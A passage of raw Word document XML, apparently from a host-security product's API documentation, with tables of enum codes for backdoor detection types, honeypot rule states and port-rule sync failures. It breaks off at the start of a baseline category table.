          <w:p w14:paraId="4E2F9233" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>backDoorTypeId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12087F4E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B087F77" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>可疑启动项</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="717BE6BC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19496CE7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>backDoorTypeId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30E3A9CB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28F59C5A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>映像劫持</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6C65CB89" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="394FA36C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>backDoorTypeId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F3D3A14" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AE9F4EC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>恶意进程</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="183E43C1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="311" w:name="网络蜜罐规则状态"/>
      <w:bookmarkEnd w:id="310"/>
      <w:r>
        <w:t>网络蜜罐规则状态</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="788"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1004"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="1056421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27B9F5B1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24135215" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1440ADBF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="750DE5B6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5833488C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4272FFEC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50D0CB23" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>规则启用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1E20D669" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31327BD1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78C4CEC6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="313D7791" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>规则禁用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6CCE40B9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="312" w:name="网络蜜罐规则同步状态"/>
      <w:bookmarkEnd w:id="311"/>
      <w:r>
        <w:t>网络蜜罐规则同步状态</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1331"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1201"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="5CDF777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3F95FD75" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78293BE8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60EC1B48" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2F184406" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03F7EA8E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>verifyStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58EDEB87" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A717EBF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>规则同步中</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="71061AAA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50F65D77" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>verifyStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="166C7C6B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5AEDD4B5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>同步完毕</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1239CFB7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="313" w:name="网络蜜罐规则端口状态"/>
      <w:bookmarkEnd w:id="312"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>网络蜜罐规则端口状态</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="788"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="6128"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="1D0962D5"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EE25EF2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D613DFB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7693BEBD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4B66AA46" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C2136C3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="713E7ED9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>-2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05954AE3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>端口删除规则进行中</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6A9F59E4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C9F2808" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40CF8443" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7411D182" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>端口新增规则同步行中</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="61A5ED1E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E486ECB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BCF6253" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DFBD84E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>端口规则同步成功</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="714FC9BF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35868E5C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06103FEF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38716581" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>端口同步规则失败,原因：agent离线</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4E3B476D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CFB93F5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A67E34F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E884E93" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>端口同步规则失败,原因：agent返回超时</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="43A8624C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="532FFB56" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72C9EACE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4741D580" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>端口同步规则失败,原因：agent停用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2E853B0A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DCFCC6F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17E29B76" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B72CF3D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>端口同步规则失败,原因：agent未返回对应端口信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4D455B6C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4836CD6B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79735317" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="584795A9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>端口同步规则失败,原因：服务端参数错误</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2C7A427F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78D10EB4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="072E12BE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D91C68A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>端口同步规则失败,原因：系统错误(线程创建失败，内存分配失败等)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7FC3D77B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6955DBF9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DE4D77F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F2BD629" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>端口同步规则失败,原因：agent已降级功能不能使用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7223C8F4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="172E7BCD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D503386" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38D58388" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>端口同步规则失败,原因：其他原因监听失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2F2ECF29" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61E11C98" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1412D90D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="321D756E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>端口同步规则失败,原因：其他原因监听失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="31CE1556" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="314" w:name="基线类别"/>
      <w:bookmarkEnd w:id="313"/>
      <w:r>
        <w:t>基线类别</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="809"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1004"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="250EB456"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A155BFC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3076A0EC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5208576C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="37827649" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40290283" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>family</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00522912" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
